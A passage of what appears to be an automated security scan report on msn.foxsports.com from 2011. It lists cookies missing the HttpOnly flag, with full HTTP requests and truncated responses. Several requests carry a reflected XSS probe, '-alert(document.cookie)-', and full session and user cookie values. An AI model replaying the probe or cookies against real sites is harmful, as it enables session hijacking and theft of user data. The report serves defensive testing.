Set-Cookie: glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pRME=; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: UnicaNIODID=I7HpnSWrYC7-Ww6qltH; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pUID=/k94ON71KoD/EYqOMDzIDg==; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pENC_FNAME=Z1NVLTXWY1w=; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _gig_mig=1; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pEFSUID=/k94ON71KoD/EYqOMDzIDg==; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NetInsightSessionID=1; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _chartbeat2=oxy92bi233plhtq3; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pExternalUser=; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: MUID=65AFF4B77A124856A6B4337A160FA285; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; Domain=.foxsports.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/


8.2. http://msn.foxsports.com/account/regPopup

Summary

Severity:   Low
Confidence:   Firm
Host:   http://msn.foxsports.com
Path:   /account/regPopup

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/regPopup?divId=registration&efsuid=p%2Fk94ON71KoD%2FEYqOMDzIDg%3D%3D HTTP/1.1
Host: msn.foxsports.com
Proxy-Connection: keep-alive
Referer: http://msn.foxsports.com/account/transition?fu=http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611?8dd92'-alert(document.cookie)-'c38e52b2865=1&initiatingAction=registration&egs=Br6fOGGTWiuzTHiTHk2TzuyT6zQ%3D&ts=1294446581&esefsuid=p%2Fk94ON71KoD%2FEYqOMDzIDg%3D%3D
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; NetInsightSessionID=1; UnicaNIODID=desyou1VHJ2-Ww6pyII; pALERTED=TRUE; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pExternalUser=; pLMD="2011-01-08 00:29:40"; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pENC_FNAME=Z1NVLTXWY1w=; pENC_LNAME=/wgeX1XilBI=; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8faWo21+967G5VI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAYzZ7kzf7qlWgWeR/uovPQww==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCROxuO+YKyVeX7VpqEGMPu4akUu+MvLCZD/TvFgkbWxEqngFEv2yyszi6CK3C+DMIRTuJe07xWXcKcYLhi2LDmTGASfy8pQ9OxVXdOY7vU8EZaDs39+Aki4D8BhFFDJwaqB/Vsqyg5NK2sjAH6QM2nalSQxKBe3ixzNs3FhZ3AJ0a; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF0tmdVYO39pJU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi2Bt1ptjLOaC; p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjCrs73KCEqhp; pUID=/k94ON71KoD/EYqOMDzIDg==; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
Expires: Sat, 08 Jan 2011 00:29:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 00:29:45 GMT
Connection: close
Content-Length: 13026


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="ht
...[SNIP]...

8.3. http://msn.foxsports.com/account/register

Summary

Severity:   Low
Confidence:   Firm
Host:   http://msn.foxsports.com
Path:   /account/register

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/register?fu=http%3A%2F%2Fmsn.foxsports.com%2Fcollegefootball%2Fstory%2FStanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611%3F8dd92'-alert(document.cookie)-'c38e52b2865%3D1 HTTP/1.1
Host: msn.foxsports.com
Proxy-Connection: keep-alive
Referer: http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611?8dd92'-alert(document.cookie)-'c38e52b2865=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; MUID=DC63BAA44C3843F38378B4BB213E0A6F; NetInsightSessionID=1; UnicaNIODID=desyou1VHJ2-Ww6pyII

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
Expires: Sat, 08 Jan 2011 00:28:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 00:28:45 GMT
Connection: close
Content-Length: 22487


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

8.4. http://msn.foxsports.com/account/transition

Summary

Severity:   Low
Confidence:   Firm
Host:   http://msn.foxsports.com
Path:   /account/transition

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/transition?fu=http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611?8dd92'-alert(document.cookie)-'c38e52b2865=1&initiatingAction=registration&egs=Br6fOGGTWiuzTHiTHk2TzuyT6zQ%3D&ts=1294446581&esefsuid=p%2Fk94ON71KoD%2FEYqOMDzIDg%3D%3D HTTP/1.1
Host: msn.foxsports.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; NetInsightSessionID=1; UnicaNIODID=desyou1VHJ2-Ww6pyII; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pExternalUser=; pLMD="2011-01-08 00:29:40"; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pENC_FNAME=Z1NVLTXWY1w=; pENC_LNAME=/wgeX1XilBI=; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8faWo21+967G5VI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAYzZ7kzf7qlWgWeR/uovPQww==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCROxuO+YKyVeX7VpqEGMPu4akUu+MvLCZD/TvFgkbWxEqngFEv2yyszi6CK3C+DMIRTuJe07xWXcKcYLhi2LDmTGASfy8pQ9OxVXdOY7vU8EZaDs39+Aki4D8BhFFDJwaqB/Vsqyg5NK2sjAH6QM2nalSQxKBe3ixzNs3FhZ3AJ0a; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF0tmdVYO39pJU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi2Bt1ptjLOaC; p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjCrs73KCEqhp; pUID=/k94ON71KoD/EYqOMDzIDg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
P3P: CP='DSP CUR OTi IND OTRi ONL FIN'
Expires: Sat, 08 Jan 2011 00:29:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 00:29:45 GMT
Connection: close
Content-Length: 4257


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...

8.5. http://msn.foxsports.com/fantasy/collegefootball/bowlpickem/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://msn.foxsports.com
Path:   /fantasy/collegefootball/bowlpickem/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fantasy/collegefootball/bowlpickem/ HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; 
pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 33174
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Path=/
Set-Cookie: NSC_gtg-qjdlfn-qspe-mb1=445336ff156a;path=/
Set-Cookie: NSC_gtg-qjdlfn-qspe-mb1=445336fd156a;path=/
Expires: Sat, 08 Jan 2011 01:13:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:13:17 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>


   
...[SNIP]...

8.6. http://msn.foxsports.com/fantasy/collegefootball/pickem/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://msn.foxsports.com
Path:   /fantasy/collegefootball/pickem/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fantasy/collegefootball/pickem/ HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; 
pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 42110
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Path=/
Set-Cookie: NSC_gtg-qjdlfn-qspe-mb1=445336ff156a;path=/
Set-Cookie: NSC_gtg-qjdlfn-qspe-mb1=445336fd156a;path=/
Expires: Sat, 08 Jan 2011 01:13:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:13:31 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>


   
...[SNIP]...

8.7. http://msn.foxsports.com/account/verify

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /account/verify

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/verify?euid=%2Fk94ON71KoD%2FEYqOMDzIDg%3D%3D HTTP/1.1
Host: msn.foxsports.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
